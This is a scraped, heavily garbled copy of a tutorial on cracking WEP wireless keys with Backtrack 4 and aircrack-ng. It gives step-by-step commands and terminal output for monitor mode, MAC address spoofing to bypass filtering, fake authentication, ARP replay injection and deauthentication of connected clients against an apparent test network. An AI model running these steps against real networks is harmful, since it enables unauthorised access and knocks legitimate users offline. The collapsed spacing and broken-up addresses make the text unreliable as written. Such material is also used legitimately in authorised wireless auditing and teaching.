Cracking WEP with Backtrack 4 and aircrackngWord文档格式.docx
《Cracking WEP with Backtrack 4 and aircrackngWord文档格式.docx》由会员分享,可在线阅读,更多相关《Cracking WEP with Backtrack 4 and aircrackngWord文档格式.docx(22页珍藏版)》请在冰点文库上搜索。
(airmon-ngstopwireless_int,
ifconfigwireless_intdown,macchanger–mXX:
XX:
XXwireless_int,ifconfigwireless_intup,airmon-ngstartwireless_int)
∙AssociatewithAPandinjectARPpackets(airodump-ng–c<
channel>
–-ivs–w/tmp/filenamewireless_int_in_monitormode,aireplay-ng–fakeauth0–a<
BSSID>
–h<
localMAC>
–eESSIDwireless_int_in_monitormode>
aireplay-ng-3-b<
wireless_int_in_monitor_mode)
∙IfnoARPisfound(andinjected)inareasonableamountoftime,trytodeauthenticateanexistingclient(aireplay-ng–deauth0-aBSSID–cCLientMACwireless_int_in_monitor_mode)
∙SaveIV’stofileandcrackthekey(airocrack-ng–0–bBSSID/tmp/filename.ivs)
Inallcases,inallscenario’s,themostimportantcomponentisverifyingthatyoucanassociatewithanAP.You’lllearnsometechniquesonhowtodothisinthisblog.Butlet’snotjumpahead.
First,listtheadapters:
root@bt:
~#airmon-ng
InterfaceChipsetDriver
wifi0Atherosmadwifi-ng
wlan0Ralink2573USBrt73usb-[phy0]
ath0Atherosmadwifi-ngVAP(parent:
wifi0)
Thewifi0adapteristheproximpcmciacard.
wlan0istheDlinkUSBadapter.
Forthistest,we’llusetheproximcard(wifi0).
Themacaddressofthiscardis00:
20:
A6:
4F:
A9:
41
(youcangetthemacaddressbyrunning‘ifconfigwifi0’)
First,putthecardinmonitormode:
~#airmon-ngstartwifi0
ath1Atherosmadwifi-ngVAP(parent:
wifi0)(monitormodeenabled)
Anewinterfacecalled“ath1”hasbeencreated.Thisinterfaceistheonewearegoingtouseinordertofindthewirelessnetworks.Launch“airodump-ngath1”tohopallchannelsandshowthewirelessnetworksthatcanbefound,andtheclients(ifany)thatarecurrentlyassociatedwithanAccessPoint:
~#airodump-ngath1
CH1][Elapsed:
1min][2009-02-1914:
05
BSSIDPWRBeacons#Data,#/sCHMBENCCIPHERAUTHESSID
00:
14:
BF:
89:
9C:
D334104001154.WEPWEPTestNet
BSSIDSTATIONPWRRateLostPacketsProbe
D300:
1C:
90:
5B:
A3550-1012TestNet
19:
52:
AD:
F7710-132441TestNet
Ok,sowehavefoundanetworkwithESSID“TestNet”,operatingatchannel11.Apparentlythereare2clientsconnectedtothisAP.
Let’sseeifwecanassociatewithAccessPointwithMAC(BSSID)00:
D3
First,runairodump-ngagain,butsetittolookatchannel11.
ThisisrequiredfortheAPassociation/authentication(viaaireplay-ng)tooperateatchannel11aswell(becauseyoucannotspecifythechanneltousewhenrunningaireplay-ng):
/#airodump-ng--channel11ath1
Leavetheairodump-ngrunningfornowandrunthefollowingaireplay-ngcommandtoperforma‘fakeauthentication’attempt:
~#aireplay-ng--fakeauth0-a00:
D3-eTestNetath1
NosourceMAC(-h)specified.UsingthedeviceMAC(00:
41)
50Waitingforbeaconframe(BSSID:
D3)onchannel11
50SendingAuthenticationRequest(OpenSystem)[ACK]
50APrejectsthesourceMACaddress(00:
41)?
Authenticationfailed(code1)
53SendingAuthenticationRequest(OpenSystem)[ACK]
53APrejectsthesourceMACaddress(00:
Ok–Authenticationfailed,sotheAPdoesMACfiltering.WecouldtrytousetheMACaddressofoneoftheclientsthatarealreadyconnected(byspecifyingitsMACaddressusingthe–hparameter),butwe’llchangetheMACaddressonourinterface(whichwillmakeallfuturecommandsshorter)
First,killtheairodump-ngprocess.
Takewifi0(ath1)outofmonitoringmode:
~#airmon-ngstopath1
wifi0)(VAPdestroyed)
Bringwifi0down,changethemacaddressofwifi0,bringwifi0upagainandthenputtheinterfacebackinmonitormode:
~#ifconfigwifi0down
~#macchanger-m00:
A3wifi0
CurrentMAC:
a6:
4f:
a9:
44(Proxim,Inc.)
FakedMAC:
1c:
bf:
5b:
a3(unknown)
~#ifconfigwifi0up
~#ifconfigath1
ath1Linkencap:
UNSPECHWaddr00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00
UPBROADCASTRUNNINGMULTICASTMTU:
1500Metric:
1
RXpackets:
106errors:
0dropped:
0overruns:
0frame:
TXpackets:
0errors:
0carrier:
collisions:
0txqueuelen:
RXbytes:
9448(9.4KB)TXbytes:
0(0.0B)
Ok,looksgood
Let’sseeifitmakesadifference.
Runairodump-ngagain(airodump-ng–c11ath1)andthentrytoperformthefakeauthenticationagain
/#aireplay-ng--fakeauth0-a00:
A3)
19Waitingforbeaconframe(BSSID:
19SendingAuthenticationRequest(OpenSystem)[ACK]
19Authenticationsuccessful
19SendingAssociationRequest[ACK]
19Associationsuccessful:
-)(AID:
1)
IfyouareconnectingtoanAPthatisabitpicky,thenyouhavesomeoptionstotweaktheaireplay-ngbehaviour:
aireplay-ng-16000-o1-q12-eTestNet-a00:
D3ath1
–16000=reauthenticateevery6000seconds
-o1=onlysendonesetofpacketsatatime
-q12=sendkeepalivepacketsevery12seconds
(sometimes,itworksbetterwithoutthislastparameter)
Fromthispointforward,youshouldbeabletoassociatewiththeAP.Ifnot,there’snouseincontinuingwiththeprocess.
Ok,nowlet’strytocrackthekey.First,stoptheexistingairodumpprocessandrunairodump-ngwiththeoptiontosavetheiv’stoafile(parameter–i
or
–ivs):
~#airodump-ng-c11-w/tmp/TestNetAudit1-iath1
CH11][Elapsed:
12s][2009-02-1914:
24
BSSIDPWRRXQBeacons#Data,#/sCHMBENCCIPHERAUTHESSID
00:
D334100135001154.WEPWEPOPNTestNet
BSSIDSTATIONPWRRateLostPacketsProbe
F7430-11084TestNet
Thenumberof#Datapacketsismostlikelystillverylowanddoesnotgoupasfastaswewantitto.SoweneedtograbanARPpacketandinjectit.
First,launchaireplay-ngininjectionmode:
~#aireplay-ng-3-b00:
Forinformation,noactionrequired:
Usinggettimeofday()insteadof/dev/rtc
26:
55Waitingforbeaconframe(BSSID:
SavingARPrequestsinreplay_arp-0219-142655.cap
Youshouldalsostartairodump-ngtocapturereplies.
Read243packets(got0ARPrequestsand0ACKs),sent0packets...(0pps)
(leavethisrunning–waituntilanARPrequestisseen.ThetoolwillthenautomaticallyattempttoinjecttheARPpackets,thusincreasingthenumberofdatapackets(andiv’s)onthenetwork).SomeAP’srequireyoutobeassociated(orwillperformdisassociateafterawhile).ItmighttakeacoupleofminutesbeforeanARPisseen.Ifyoudon’thavealotoftime,itmighthelptryingtoassociateyourselfagain:
aireplay-ng--fakeauth0-a00:
IfthatdoesnotgeneratetherequiredARPpacket(s),whichshouldsetofftheARPinjection,thentrytodeauthenticatetheexistingclients.(whichmaynotworkverywelliftheAPhasMACfilteringenabled.IfyouhaveasecondclientMACaddress,youcansetyourownMACaddresstooneoftheclientsandtrytodeauththeotherclient…)
Keeptheaireplay-ngandairodump-ngrunningandrunthedeauthattack.
/#aireplay-ng--deauth0-a00:
38:
15Waitingforbeaconframe(BSSID:
NB:
thisattackismoreeffectivewhentargeting
aconnectedwirelessclient(-c<
client'
smac>
).
15Sending